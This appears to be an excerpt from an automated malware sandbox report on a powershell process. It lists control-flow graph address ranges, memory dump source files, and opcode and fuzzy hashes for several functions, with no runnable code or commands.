7ffb4b384649 257->263 264 7ffb4b38464b-7ffb4b38464d 262->264 263->264 264->214 266 7ffb4b384653-7ffb4b38465b 264->266 267 7ffb4b38465d-7ffb4b384667 266->267 268 7ffb4b38466b 266->268 269 7ffb4b384669 267->269 270 7ffb4b384687-7ffb4b3846b6 267->270 271 7ffb4b384670-7ffb4b384685 268->271 269->271 276 7ffb4b3846bd-7ffb4b3846cf 270->276 271->270
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483934729.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b380000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a67a2f06e4f6941184f8ec074233ab6e2e31625255991898d36da2d332b35d81
                                                  • Instruction ID: 7817b28e4da8dc313f33147dde5e12cd072cb3f6f36dac698997b53f628e10e2
                                                  • Opcode Fuzzy Hash: a67a2f06e4f6941184f8ec074233ab6e2e31625255991898d36da2d332b35d81
                                                  • Instruction Fuzzy Hash: AFD156A291EA895FEB66EF7CC8555B97FD1EF16210F0840FED18CC74A3E9189805C352
                                                  Function 00007FFB4B381834 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483934729.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b380000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92621c4c694ddccb09efa84c74b8ba93407050758076aea03740311ccc80498b
                                                  • Instruction ID: c50d617d90da9d5f3a99fdfa33fe928784b0ea2da366bde078ca579ca872ebd3
                                                  • Opcode Fuzzy Hash: 92621c4c694ddccb09efa84c74b8ba93407050758076aea03740311ccc80498b
                                                  • Instruction Fuzzy Hash: DA213AE2E1DE4A4FF7A5BE3DA84227566C2EF88350B5840BDD14DC31A2DD28BC164243

                                                  Non-executed Functions

                                                  Function 00007FFB4B2B5F78 Relevance: 7.0, Strings: 5, Instructions: 737COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 446 7ffb4b2b5f78-7ffb4b2b5fc4 452 7ffb4b2b5fc5-7ffb4b2b5fdc 446->452 454 7ffb4b2b5fde-7ffb4b2b6031 452->454 460 7ffb4b2b6035-7ffb4b2b604c 454->460 463 7ffb4b2b604e-7ffb4b2b60c1 460->463 471 7ffb4b2b60c4-7ffb4b2b60dc 463->471 474 7ffb4b2b60de-7ffb4b2b6131 471->474 480 7ffb4b2b6134-7ffb4b2b614c 474->480 483 7ffb4b2b614e-7ffb4b2b6229 480->483 498 7ffb4b2b622b-7ffb4b2b6244 483->498 501 7ffb4b2b6246-7ffb4b2b6329 498->501 517 7ffb4b2b632a-7ffb4b2b6344 501->517 520 7ffb4b2b6346-7ffb4b2b6362 517->520 522 7ffb4b2b6364-7ffb4b2b636a 520->522 523 7ffb4b2b63b0-7ffb4b2b63b1 520->523 524 7ffb4b2b63b8-7ffb4b2b63bf 522->524 525 7ffb4b2b636c-7ffb4b2b6372 522->525 529 7ffb4b2b63b3-7ffb4b2b63b6 523->529 528 7ffb4b2b63c0-7ffb4b2b63c9 524->528 527 7ffb4b2b6374-7ffb4b2b63ae 525->527 525->528 527->523 533 7ffb4b2b6418-7ffb4b2b6426 528->533 534 7ffb4b2b63cc-7ffb4b2b63d1 528->534 529->524 540 7ffb4b2b642d-7ffb4b2b6441 533->540 534->529 534->533 542 7ffb4b2b6423-7ffb4b2b6426 540->542 543 7ffb4b2b6443-7ffb4b2b64af 540->543 542->540 553 7ffb4b2b64b2 543->553 554 7ffb4b2b64b4-7ffb4b2b64d1 553->554 555 7ffb4b2b6500-7ffb4b2b652e 553->555 554->553 559 7ffb4b2b654d-7ffb4b2b654e 555->559 560 7ffb4b2b6530-7ffb4b2b6536 555->560 561 7ffb4b2b6569-7ffb4b2b656e 559->561 562 7ffb4b2b6550 559->562 565 7ffb4b2b6554-7ffb4b2b6556 560->565 566 7ffb4b2b6538-7ffb4b2b653e 560->566 564 7ffb4b2b6570-7ffb4b2b6576 561->564 562->565 570 7ffb4b2b6577-7ffb4b2b657d 564->570 565->564 568 7ffb4b2b6558 565->568 571 7ffb4b2b655b-7ffb4b2b655e 566->571 572 7ffb4b2b6540-7ffb4b2b6546 566->572 568->571 576 7ffb4b2b657e-7ffb4b2b65af 570->576 571->570 573 7ffb4b2b6560 571->573 577 7ffb4b2b6562-7ffb4b2b6566 572->577 578 7ffb4b2b6548 572->578 573->577 586 7ffb4b2b65b1-7ffb4b2b65d1 576->586 577->576 580 7ffb4b2b6568 577->580 578->559 580->561 586->586
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483067437.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b2b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8!^K$X"^K$` ^K$L_I$L_I
                                                  • API String ID: 0-1255659150
                                                  • Opcode ID: 60eb51d3b787df7770233e3aed5a3bffee4ed0644be5fbacea80faeefb0beb34
                                                  • Instruction ID: 9efbdbd7d496fded00a3c5f351c11af04b728f8c3d97d3e60a0c15d096b0275d
                                                  • Opcode Fuzzy Hash: 60eb51d3b787df7770233e3aed5a3bffee4ed0644be5fbacea80faeefb0beb34
                                                  • Instruction Fuzzy Hash: 4F22B9C3E0D5920AF3177EBCBD161F9EFD1EF857A470881BBD18C4A1AB6C245A4682D1